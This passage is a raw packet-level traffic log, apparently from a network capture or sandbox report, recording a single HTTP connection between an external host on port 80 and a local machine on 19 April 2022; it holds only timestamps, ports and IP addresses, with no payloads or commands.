Apr 19, 2022 16:44:44.438448906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.438539982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.438594103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.438623905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.438669920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.438796997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.438930988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.438972950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.439022064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.439094067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.439133883 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.439181089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.439312935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.439431906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.439488888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.439559937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.439603090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.439666033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.439754009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.439802885 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.439871073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.439969063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.440092087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.440151930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.440258026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.440304995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.440314054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.440457106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.440555096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.440618038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.440664053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.440716028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.440774918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.440896988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.441013098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.441056967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.441137075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.441174984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.441229105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.441405058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.441498041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.441543102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.441577911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.441616058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.441715956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.441780090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.441874027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.441916943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.441999912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.442039013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.442135096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.442302942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.442342997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.442394972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.442492962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.442534924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.442570925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.442675114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.442811012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.442864895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.442967892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.443016052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.443072081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.443186998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.443360090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.443399906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.443411112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.443447113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.443491936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.443623066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.443723917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.443772078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.443830013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.443876028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.443975925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.444094896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.444214106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.444257975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.444371939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.444411993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.444525957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.444710016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.444788933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.444840908 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.444880962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.444921017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.444924116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.445009947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.445048094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.445094109 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.445168972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.445209026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.445285082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.445445061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.445554018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.445604086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.445643902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.445683956 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.445756912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.445960999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.446002007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.446069002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.446124077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.446177959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.446257114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.446435928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.446468115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.446517944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.446552038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.446593046 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.446739912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.446818113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.446942091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.446989059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.447005987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.447046041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.447124004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.447237968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.447336912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.447431087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.447511911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.447536945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.447655916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.447818995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.447874069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.447930098 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.448009014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.448118925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.448219061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.448266983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.448345900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.448385954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.448489904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.448549986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.448673010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.448714972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.448796988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.448846102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.448923111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.449033022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.449147940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.449188948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.449266911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.449306011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.449419975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.449498892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.449620008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.449671984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.449700117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.449738026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.449860096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.449933052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.450159073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.450192928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.450218916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.450248003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.450270891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.450402975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.450444937 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.450462103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.450686932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.450711012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.450752974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.450881958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.450918913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.450953960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.451040030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.451158047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.451196909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.451287985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.451324940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.451409101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.451507092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.451642990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.451653957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.451714039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.451829910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.451879025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.451975107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.452020884 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.452080965 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.452195883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.452366114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.452413082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.452441931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.452478886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.452517033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.452687025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.452758074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.452797890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.452882051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.452922106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.453006983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.453087091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.453222036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.453263044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.453314066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.453351974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.453485966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.453562021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.453685999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.453727007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.453800917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.453838110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.453948021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.454052925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.454186916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.454266071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.454288960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.454308987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.454330921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.454441071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.454638958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.454684973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.454689026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.454727888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.454768896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.454911947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.455039978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.455091000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.455168962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.455214977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.455286980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.455365896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.455482960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.455528975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.455602884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.455656052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.455693007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.455835104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.455910921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.455956936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.456012011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.456053019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.456176043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.456295967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.456371069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.456418991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.456480980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.456522942 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.456666946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.456804991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.456840992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.456891060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.456969976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.457017899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.457050085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.457163095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.457282066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.457330942 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.457442999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.457489967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.457529068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.457662106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.457747936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.457804918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.457839012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.457880020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.457974911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.458081007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.458127022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.458189964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.458314896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.458357096 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.458425045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.458522081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.458642006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.458686113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.458736897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.458868980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.458914995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.458961964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.459018946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.459088087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.459197044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.459239960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.459321976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.459459066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.459537029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.459578991 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.459685087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.459783077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.459826946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.459912062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.459954023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.460042000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.460156918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.460202932 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.460236073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.460362911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.460459948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.460505009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.460550070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.460591078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.460686922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.460789919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.460829020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.460916996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.460999012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.461044073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.461136103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.461268902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.461347103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.461380005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.461483002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.461530924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.461586952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.461716890 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.461853027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.461914062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.461966991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.462017059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.462052107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.462192059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.462292910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.462356091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.462369919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.462418079 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.462538004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.462613106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.462729931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.462763071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.462810993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.462851048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.462992907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.463079929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.463152885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.463202000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.463279009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.463319063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.463399887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.463514090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.463633060 CEST	80	49758	45.135.48.153	192.168.2.4
